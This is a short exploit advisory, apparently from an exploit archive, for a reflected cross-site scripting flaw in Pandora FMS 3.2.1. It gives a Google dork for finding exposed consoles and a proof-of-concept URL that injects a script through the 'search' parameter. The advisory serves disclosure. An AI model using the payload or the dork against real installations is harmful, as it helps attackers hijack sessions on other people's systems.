Pandora FMS version 3.2.1 suffers from a cross site scripting vulnerability.
1d8cd29c9db357fc7f3f9f3b93b48c16cfa60f5c242b1bc2adc2312ecb503d85
# Exploit Title: Pandora FMS v3.2.1 Cross Site Scripting
# Google Dork: intitle:"Pandora FMS - the Flexible Monitoring System" intext:"Your IP"
# Date: 8-08-2011
# Author: Mehdi Boukazoula
# Software Link: https://pandorafms.org/
# Version: v 3.2.1
# Tested on: v =< 3.2.1
# Description : affected parameter : search page : index.php
PoC :
https://localhost/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=12&offset=0&search=bob%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E